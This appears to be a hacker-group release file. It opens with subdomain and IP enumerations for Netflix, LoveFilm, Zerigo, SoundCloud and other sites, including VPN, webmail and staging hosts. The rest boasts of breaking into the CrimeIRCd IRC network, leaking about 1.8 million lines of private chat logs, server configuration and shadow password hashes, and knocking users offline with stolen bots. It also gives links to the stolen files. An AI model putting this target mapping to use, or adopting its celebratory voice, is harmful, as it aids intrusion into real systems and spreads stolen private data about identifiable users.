https://signup.netflix.com/login?nextpage=http%3A%2F%2Fwww.netflix.com%2FDVDDetail.aspx%3Flocale%3Den-IE%26Title%3DMayhem
developer.netflix.com/search?q=xml&page=3
https://signup.netflix.com/login?nextpage=http%3A%2F%2Fwww.netflix.com%2FXML%2FU%2FMovieData%3Fpos%3D8%26ds%3D0%26linkCtr%3DTXT%26movieid%3D443317%26bobenhanced%3Dyes
216.205.72.158 atlanta.netflix.com
69.53.236.144 b2b.netflix.com
69.53.236.18 beta.netflix.com
69.53.236.15 ca.netflix.com
207.210.238.73 delta.netflix.com
69.53.236.147 ftp.netflix.com
69.53.236.24 images.netflix.com
69.53.237.38 jobs.netflix.com
69.53.237.168 kb.netflix.com
69.53.237.40 listserv.netflix.com
127.0.0.1 localhost.netflix.com
10.192.52.70 mm.netflix.com
10.192.52.69 mm.netflix.com
216.35.131.141 mx.netflix.com
69.53.255.10 ns1.netflix.com
69.53.254.10 ns2.netflix.com
69.53.236.16 partners.netflix.com
216.35.131.252 qa.netflix.com
69.53.236.21 rd.netflix.com
69.53.236.148 research.netflix.com
69.53.237.157 smtp.netflix.com
69.53.237.156 smtp.netflix.com
69.53.236.23 stage.netflix.com
69.53.236.45 support.netflix.com
216.35.131.199 uk.netflix.com
216.35.131.141 vpn.netflix.com
69.53.236.23 web.netflix.com
69.53.237.151 webmail.netflix.com
69.53.236.48 www1.netflix.com
69.53.236.19 www2.netflix.com
aa.netflix.com
agmoviecontrol.netflix.com
aladdin.netflix.com
api.netflix.com
beta.netflix.com
blog.netflix.com
cdn.netflix.com
chi1.netflix.com
corp.netflix.com
dc-nat.netflix.com
dc1.netflix.com
dc2.netflix.com
dns.netflix.com
dns2.netflix.com
dns3.netflix.com
dns5.netflix.com
dns6.netflix.com
dtemkin.netflix.com
edi01-vip1.netflix.com
edi01-vip2.netflix.com
ehub.netflix.com
equinix-sjc.netflix.com
ftp.netflix.com
grparker.netflix.com
gslbdns.netflix.com
gslbdns2.netflix.com
hb-nat.netflix.com
host49.netflix.com
host50.netflix.com
host51.netflix.com
host52.netflix.com
host53.netflix.com
host54.netflix.com
host55.netflix.com
host56.netflix.com
host57.netflix.com
host58.netflix.com
host59.netflix.com
host60.netflix.com
host61.netflix.com
host62.netflix.com
hostmaster.netflix.com
image.netflix.com
ipv6.netflix.com
ir.netflix.com
jobs.netflix.com
lg-nat.netflix.com
moviecontrol.netflix.com
movielicense.netflix.com
movies.netflix.com
mta00-ecom.netflix.com
mta00-mktg.netflix.com
mta01-ecom.netflix.com
mta01-mktg.netflix.com
mta02-ecom.netflix.com
mta02-mktg.netflix.com
mta03-ecom.netflix.com
mta03-mktg.netflix.com
mta04-ecom.netflix.com
mta04-mktg.netflix.com
mta05-ecom.netflix.com
mta05-mktg.netflix.com
mta06-ecom.netflix.com
mta06-mktg.netflix.com
mta07-ecom.netflix.com
mta07-mktg.netflix.com
mta08-ecom.netflix.com
mta08-mktg.netflix.com
mta09-ecom.netflix.com
mta09-mktg.netflix.com
mta10-ecom.netflix.com
mta10-mktg.netflix.com
mta11-ecom.netflix.com
mta11-mktg.netflix.com
mta12-mktg.netflix.com
mta13-ecom.netflix.com
mta13-mktg.netflix.com
mta14-ecom.netflix.com
mta14-mktg.netflix.com
mta15-ecom.netflix.com
mta15-mktg.netflix.com
mta16-ecom.netflix.com
mta16-mktg.netflix.com
mta17-ecom.netflix.com
mta17-mktg.netflix.com
mta18-ecom.netflix.com
mta18-mktg.netflix.com
mta19-ecom.netflix.com
mta19-mktg.netflix.com
mx-ecom.netflix.com
mx-mktg.netflix.com
mx-mktgco.netflix.com
mx-mktgnonmem.netflix.com
mx-setl.netflix.com
mx1.netflix.com
mx2.netflix.com
nat.netflix.com
nicadmin.netflix.com
ns1.netflix.com
ns2.netflix.com
oscarquotes.netflix.com
paix1.netflix.com
partners.netflix.com
prod.netflix.com
prod1.netflix.com
rd.netflix.com
research.netflix.com
rss.netflix.com
screening.netflix.com
splatter.netflix.com
stage.netflix.com
unk.netflix.com
web.netflix.com
+http://ultradns.org
---
ticketmaster.com
tickets.com
glennbeck.com
---
lovefilm.com
212.140.241.196 access.lovefilm.com
82.109.92.116 ad.lovefilm.com
79.125.13.66 blog.lovefilm.com
194.117.248.107 csdev.lovefilm.com
194.117.248.104 cs.lovefilm.com
194.117.248.99 images4.lovefilm.com
194.117.248.94 staging.lovefilm.com
194.117.248.93 apistage.lovefilm.com
194.117.248.96 images1.lovefilm.com
194.117.248.97 images2.lovefilm.com
194.117.248.98 images3.lovefilm.com
194.117.248.100 digital.lovefilm.com
194.117.248.100 lovefilm.com
194.117.248.100 www.lovefilm.com
194.117.248.100 aol.lovefilm.com
194.117.248.100 virginnet.lovefilm.com
194.117.248.100 help.shop.lovefilm.com
194.117.248.100 shop.lovefilm.com
194.117.248.111 cert.lovefilm.com
194.117.248.116 testcard.lovefilm.com
194.117.248.117 watchnow-dev.lovefilm.com
194.117.248.119 openapi.lovefilm.com
194.117.248.123 static.digital-preview.lovefilm.com
194.117.248.126 watchnow.lovefilm.com
194.117.248.127 openapi.mashery.lovefilm.com
194.117.248.130 dailymail.lovefilm.com
194.117.248.131 digital-test.lovefilm.com
194.117.248.127 api.mashery.lovefilm.com
194.117.248.123 digital-preview.lovefilm.dev3.lovefilm.com
194.117.248.123 digital-preview.static.lovefilm.dev3.lovefilm.com
194.117.248.123 digital-qa.lovefilm.com
194.117.248.119 api.lovefilm.com
194.117.248.117 api.digital-tv.lovefilm.com
194.117.248.117 digital-preview.lovefilm.dev4.lovefilm.com
194.117.248.117 digital-preview.lovefilm.com
194.117.248.117 digital-tv.lovefilm.com
194.117.248.150 chat.lovefilm.com
194.117.248.152 apiext1.lovefilm.com
212.140.241.202 ftp.lovefilm.com
212.60.14.114 germany.lovefilm.com
83.100.128.50 info.lovefilm.com
194.117.248.130 london.lovefilm.com
82.151.231.188 mailhost.lovefilm.com
82.151.234.76 office.lovefilm.com
212.140.241.201 partners.lovefilm.com
212.140.241.207 remote.lovefilm.com
194.117.248.100 static.lovefilm.com
217.72.240.200 streaming.lovefilm.com
213.115.60.196 sweden.lovefilm.com
194.117.248.176 star.lovefilm.com
194.117.248.176 test.lovefilm.com
194.117.248.176 bounce.lovefilm.com
194.117.248.176 gbc1-be-12.lovefilm.com
212.140.241.194 vpn.lovefilm.com
85.133.5.116 vpn2.lovefilm.com
212.140.241.218 webmail.lovefilm.com
http://www.lovefilm.com/browse/film/watch-online/subscription/?facet-3=collection_id%7C8562
www.lovefilm.com/browse/film.html?facet-1=catalog%7Cvideo&facet-2=media%7Cdigital&facet-3=collection_id%7C9404&order=collection
http://www.lovefilm.com/signup/1?intcid=lfctasuwohppp1
http://www.lovefilm.com/browse/film/watch-online/p3/?facet-3=collection_id|9404&sort_by=collection
http://www.lovefilm.com/browse/film/watch-online/?facet-3=collection_id|9389&sort_by=collection&intcid=masthead_digital_lost
https://www.lovefilm.com/visitor/sign_up_1.html?product_id=42414
https://www.lovefilm.com/visitor/login.html?overlay=sign_in
9gag.com
http://9gag.com/pref/safe-browse?enable=0&url=%2F&nsfw=1
https://9gag.com/login/?ref=%2Fpref%2Fsafe-browse%3Fenable%3D0%26url%3D%252F%26nsfw%3D1&nsfw=1
https://9gag.com/login
http://9gag.com/gag/4385167?ref=featured
https://9gag.com/login/?ref=/submit/photo
https://9gag.com/search?query=swaggsec&page=3
All Domains piratepad.net/9gagswagger
airtime.com
+http://www.zerigo.com/
64.27.57.0 network.ptr.zerigo.net
64.27.57.1 gw.ptr.zerigo.net
64.27.57.2 gw-r1.ptr.zerigo.net
64.27.57.3 gw-r2.ptr.zerigo.net
64.27.57.4 gw1.zerigo.net
64.27.57.5 gw2.zerigo.net
64.27.57.10 ns1.zerigo.net
64.27.57.11 a.ns.zerigo.net
64.27.57.12 a.watcher.zerigo.net
64.27.57.15 bk1.zerigo.net
64.27.57.16 bk2.zerigo.net
64.27.57.17 p.ns.zerigo.net
64.27.57.19 tick.zerigo.net
64.27.57.20 ns2.zerigo.net
64.27.57.21 21.ptr.zerigo.net
64.27.57.22 d.ns.zerigo.net
64.27.57.23 ipr1.ns.zerigo.net
64.27.57.24 url1.zerigo.net
64.27.57.26 mail1.zerigo.net
64.27.57.29 url2.zerigo.net
64.27.57.38 logomatic.zerigo.net
64.27.57.255 broadcast.ptr.zerigo.net
68.71.141.21 21.ptr.zerigo.net
68.71.141.16 16.ptr.zerigo.net
68.71.141.11 11.ptr.zerigo.net
68.71.141.10 10.ptr.zerigo.net
68.71.141.5 gw2b.zerigo.net
68.71.141.0 network.ptr.zerigo.net
68.71.141.1 gw.ptr.zerigo.net
68.71.141.2 gw-r1.ptr.zerigo.net
68.71.141.3 gw-r2.ptr.zerigo.net
68.71.141.4 gw1b.zerigo.net
68.71.141.12 a.smtpweb.zerigo.net
68.71.141.13 13.ptr.zerigo.net
68.71.141.15 logomatic.zerigo.net
68.71.141.17 p2.ns.zerigo.net
68.71.141.18 18.ptr.zerigo.net
68.71.141.19 tock.zerigo.net
68.71.141.20 20.ptr.zerigo.net
68.71.141.22 s1.ns.zerigo.net
68.71.141.23 ipr2.ns.zerigo.net
68.71.141.24 24.ptr.zerigo.net
68.71.141.26 mail2.zerigo.net
68.71.141.30 30.ptr.zerigo.net
68.71.141.31 31.ptr.zerigo.net
64.27.57.21 vpn.zerigo.net
64.27.57.6 www.zerigo.net
68.71.141.14 vconsole.zerigo.com
68.71.141.9 servers.zerigo.com
68.71.141.6 www.zerigo.com
68.71.141.7 watchdog.zerigo.com
68.71.141.8 dns.zerigo.com
68.71.141.16 backend.zerigo.com
64.27.57.8 dns.zerigo.com
4.27.57.6 www.zerigo.com
64.27.57.7 watchdog.zerigo.com
64.27.57.9 servers.zerigo.com
64.27.57.13 console.zerigo.com
64.27.57.14 www01.zerigo.com
64.27.57.18 debian.zerigo.com
68.71.141.11 ec.zerigo.com
64.27.57.25 manage.zerigo.com
64.27.57.27 ws.zerigo.com
64.27.57.28 update.zerigo.com
64.27.57.31 snapshots.zerigo.com
64.27.57.8 ns.zerigo.com
soundcloud.com
https://soundcloud.com/login
http://soundcloud.com/tracks/search?page=50&q[fulltext]=lol&q[genre]=%22Pop%22
178.249.136.150 admin.soundcloud.com
178.249.136.150 beta.soundcloud.com
96.126.126.252 blog.soundcloud.com
178.249.136.153 connect.soundcloud.com
174.129.212.2 dev.soundcloud.com
75.101.145.87 dev.soundcloud.com
75.101.163.44 dev.soundcloud.com
75.101.163.44 developer.soundcloud.com
174.129.212.2 developer.soundcloud.com
75.101.145.87 developer.soundcloud.com
75.101.145.87 developers.soundcloud.com
75.101.163.44 developers.soundcloud.com
174.129.212.2 developers.soundcloud.com
178.249.136.150 feeds.soundcloud.com
178.249.136.155 m.soundcloud.com
178.249.136.150 media.soundcloud.com
178.249.136.150 partners.soundcloud.com
178.249.136.150 static.soundcloud.com
178.249.136.150 support.soundcloud.com
178.249.136.150 upload.soundcloud.com
178.249.136.158 w.soundcloud.com
178.249.136.150 www.soundcloud.com
https://piratenpad.de/ioHbfAYqJW
https://webmail.oag.state.tx.us/gw/webacc
Create a python script to autotroll the world.
http://pastebin.com/raw.php?i=5u04pXYR
http://cineinsite.atarde.uol.com.br/filme/40/scripts/script.html
https://secure.ravand.com/dedicated_hw_upgrade.cfm?id=38
--------------------------------------------------------------------------------
Looks like they still haven't noticed us slowly removing everything of actual
value from it LOL (don't believe us? look through your revisions ;)).
Furthermore, we had obtained the IPs of their servers in specific, one of
which they have hidden behind Cloudflare and use to host http://swaggsec.com:
> 176.31.119.79
> 5.39.6.31
Following this, we decided to kick back and accrue PM/Chan logs. CrimeIRCd
grew significantly compared to the other Anonymous networks we have hooked.
As the total amount of logs neared 2 million, SwaggSec suddenly turned on
their own provider as to promote their new carding network, CorruptNET.
The dialogue from their release:
--------------------------------------------------------------------------------
"""
Ahhh How it all happened.... CrimeIRCD Hacked and OFFICIALLY OWNED! Enjoy looking
through all the ip addresses of users who you may not like.. a few gline notices
were left out only because there were alot more and the point was made.. but that
is all made up in #snoop (the channel where they also spy on your private msg's)
where it shows every user getting disconnected for being glined. List of all there
servers and names, nicks of the users who are services admin, whole list of there
spamfilters.. (take a look so you know what not to type on there so u dont get glined)
and a list of there bots and there nicks.. and just plain ol' fun brought to you
by SwaGGSeC!!!!!
Message to hew: next time dont gline users who say they say they have a way of
hacking your network.. u should maybe listen and ask questions.. and dont be a
fucking dick like you always are and go glining people.. you think you are hot
shit.. when u are just plain SHIT... now rest your head tonight to figure out what
to do to get all the glines removed and gain access back to your network... I
suggest a reinstall of all servers may help.. LMFAO...btw, since we have root on
a few of your servers.. we will be continuing to have fun in other ways by using
them for whatever we please..
OFFICIALLY HACKED! OFFICIALLY OWNED! AND STILL OWNED FOR HOURS NOW! They have been
down for a total of 8 hours since the making of this pastebin and still going...
ENJOY... I know myself and my crew did :)
"""
--------------------------------------------------------------------------------
#snoop, as it so happens, never actually existed (we verified it in our own
PM/Chan logs). Second, that is not how you own a network, we would know.
Attached to this release are the aforementioned 1,842,381 lines of logs we
acquired, along with CrimeIRCd configuration and shadow hashes. That's how
you own a network.
As of now, SwaggSec has moved to CorruptNET, which maintains a degree of
security that even Bruce Schneier himself has appraised.. oh wait..
<Gatsby> hey <- lol HTP
<Gatsby> what was the key for #security again?
<Gatsby> i forgot it
<[redacted]> bitches
<Gatsby> ty
Hm, guess not.
* Now talking on #security
* Users on #security: Gatsby bobbyflay @fame @felony @wtf911
* Gatsby_ (Gatsby@corrupt-993CD020.cust.teknikbyran.com) has joined #security
<Gatsby_> wow whos the idiot
<Gatsby_> who let "Gatsby" in
<Gatsby> why hello there
<Gatsby_> so who let you in lol
<Gatsby_> Gatsby
<Gatsby> doesnt really matter, i couldve guessed the key myself
<Gatsby_> It does matter it means someone is an idiot
<Gatsby> is that surprising?
<Gatsby_> :P
<Gatsby_> whatever we'll check the logs later
<Gatsby> same
<Gatsby_> What lol
<Gatsby_> why would you need to check logs
* Disconnected (). <- DDOS'd off the planet, with their own bots (all stolen,
haha!)
We arn't done with you, but since this isn't our fifth zine, we'll stop here.
See ya.
Files:
http://doxb.in/media/htp/crimeircd/
http://uplink.sh/crimeircd/
BTW, shoutz to Kingcope for releasing all those 0days today, nice work.
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF

14805
htp/lolanonopsdead.txt Executable file
View File

File diff suppressed because one or more lines are too long